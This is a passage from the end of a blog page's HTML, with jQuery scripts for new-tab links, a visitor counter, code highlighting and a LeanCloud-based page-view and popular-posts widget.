             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

<!--prettify代码高亮js引入-->

<script src="/plugins/prettify/prettify.js"></script>
<script type="text/javascript">
$(window).load(function(){
$('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
 prettyPrint();
})
</script>


<!--page counter part-->
<script>
function addCount (Counter) {
        url=$('.article-date').attr('href').trim();
    title = $('.article-title').text().trim();
    var query=new AV.Query(Counter);
    //use url as unique idnetfication
    query.equalTo("url",url);
    query.find({
        success: function(results){
            if(results.length>0)
            {
                var counter=results[0];
                counter.fetchWhenSave(true); //get recent result
                counter.increment("time");
                counter.save();
            }
            else
            {
                var newcounter=new Counter();
                newcounter.set("title",title);
                newcounter.set("url",url);
                newcounter.set("time",1);
                newcounter.save(null,{
                    success: function(newcounter){
                    //alert('New object created');
                    },
                    error: function(newcounter,error){
                    alert('Failed to create');
                    }
                    });
            }
        },
        error: function(error){
            //find null is not a error
            alert('Error:'+error.code+" "+error.message);
        }
    });
}
$(function(){
    var Counter=AV.Object.extend("Counter");
    //only increse visit counting when intering a page
    if ($('.article-title').length == 1)
       addCount(Counter);
    var query=new AV.Query(Counter);
    query.descending("time");
    // the sum of popular posts
    query.limit(10); 
    query.find({
        success: function(results){
                for(var i=0;i<results.length;i++)    
                {
                    var counter=results[i];
                    title=counter.get("title");
                    url=counter.get("url");
                    time=counter.get("time");
                    // add to the popularlist widget
                    showcontent=title+" ("+time+")";
                    //notice the "" in href
                    $('.popularlist').append('<li><a href="'+url+'">'+showcontent+'</a></li>');
                }
            },
        error: function(error){
            alert("Error:"+error.code+" "+error.message);
        }
        }
    )
    });</script>
  </div>
</body>
</html>